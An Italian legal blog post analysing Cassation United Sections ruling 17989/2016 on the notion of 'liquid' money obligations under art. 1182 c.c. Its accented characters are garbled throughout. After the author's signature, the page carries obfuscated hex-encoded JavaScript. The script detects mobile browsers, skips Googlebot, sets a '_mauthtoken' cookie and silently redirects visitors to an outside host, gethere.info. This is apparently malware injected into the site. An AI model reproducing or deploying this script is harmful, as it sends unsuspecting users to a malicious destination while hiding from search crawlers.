Obbligazioni portabili. Le Sezioni Unite si pronunciano sulla nozione di liquiditA�.

PuA? considerarsi liquida l’obbligazione ai sensi dell’art. 1182 , co. III, c.c.A�qualora non risulti predeterminato l’importo del corrispettivo di una prestazione, ma lo stessoA�venga autodeterminato dall’attore nell’atto con cui fa valere la propria pretesa creditoria?

Ea�� questo il quesito su cui si A? pronunciata di recente la Corte di Cassazione a Sezioni Unite con la sentenza 17989/2016A�(sentenza qui scaricabile esplicata nei passaggi fondamentaliA�corte-di-cassazione-sezioni-unite-17989-del-2016)

Nel caso di specie il ricorrente contestava la��applicazione della��art. 1182, co. IV, c.c. sebbene nella��atto di citazione fosse stata indicato il valore della��obbligazione pecuniaria.

Il punto di partenza, non contestato, da cui dipana il ragionamento della Corte di Cassazione A? che la��adempimento delle obbligazioni portabili ex art. 1182. co. III, c.c. deve essere effettuato presso il domicilio del creditore.

La a�?portabilitA�a�? della��obbligazione A? determinata dalla liquiditA� o meno della stessa.

Sulla nozione diA� liquiditA� si contendono il campo due orientamenti, entrambi suffragati da molteplici pronunce della Suprema Corte di legittimitA�.

Un primo tradizionale orientamento, avallando la��interpretazione restrittiva del concetto di liquiditA�, ritiene applicabile la��art. 1182, co. III, c.c. alle sole obbligazioni il cui valore sia determinato, ovvero a quelle determinabili con una semplice operazione aritmetica. Detto altrimenti una��obbligazione A? riconducibile tra quelle di cui alla��art. 1182, co. III, c.c. allorquando non sia necessario un titolo, convenzionale o giudiziale, per determinare la��ammontare della stessa.

Tale impostazione A? stata avversata da quanti, ritenendo che la contestazione in ordine alla��esistenza e al valore della��obbligazione attengano al merito e non incidano sulla determinabilitA� del valore della stessa ai sensi della��art. 1182, co. III, c.c., estendono la nozione di obbligazione portabile anche alle ipotesi in cui la��attore a�� nella��atto introduttivo del giudizio a�� abbia indicato il valore della pretesa. La suddetta tesi A? supportata dalla considerazione secondo la quale il criterio di determinazione del valore della controversia sulla base di quanto statuito nella��atto introduttivo del giudizio ai sensi della��art. 10 c.p.c. A? funzionale anche alla identificazione della competenza ex art. 20 c.p.c.

La Suprema Corte a Sezioni Unite, nel dirimere la controversia, rileva che la nozione di liquiditA� influisce non solo sul forum destinatae solutionis ai sensi della��art. 20, co. II, c.p.c., ma anche sulla disciplina da applicare per la produzione di interessi moratori. Le obbligazioni a�?portabilia�?, infatti, producono ex se effetti moratori. Non A? necessario che il creditore compulsi la��adempimento. Per la��effetto, una��errata interpretazione del concetto di liquiditA� sbilancerebbe il sistema a favore del creditore: il debitore che non puA? adempiere alla prestazione per causa a sA� non imputabile vedrebbe la sua posizione aggravata dalla produzione di interessi moratori.

Il principio del favor debitoris induce la Suprema Corte ad avallare la��orientamento tradizionale. Intanto una��obbligazione potrA� qualificarsi come a�?portabilea�? in quanto sussistano criteri oggettivi che evidenzino la liquiditA� della stessa.

La mera indicazione del valore della prestazione da parte del creditore non A? un criterio oggettivo.

In altri termini una��obbligazione A? liquida allorquando il suo valore sia predeterminato ovvero determinabile sulla base di criteri oggettivi previamente risultanti dal titolo. La discrezionalitA� non A? compatibile con la liquiditA�.

Avv. Assunta Roberta Esposito

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}